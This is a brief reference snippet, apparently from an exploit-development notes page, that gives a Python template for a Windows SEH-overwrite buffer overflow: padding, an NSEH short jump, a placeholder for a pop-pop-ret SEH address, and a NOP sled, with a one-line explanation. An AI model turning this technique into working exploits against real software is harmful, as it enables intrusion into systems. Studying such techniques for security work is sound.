Exploit Form:
buffer = b"A"*400 buffer += p32(0x06eb9090) # NSEH, short jump to get over SEH buffer += p32(...)# SEH, pop pop ret buffer += b"\x90"*(600-len(buffer))
Overwrite SEH with pop pop ret and place a short jump in NSEH to get over the SEH pointer.
Last updated 1 year ago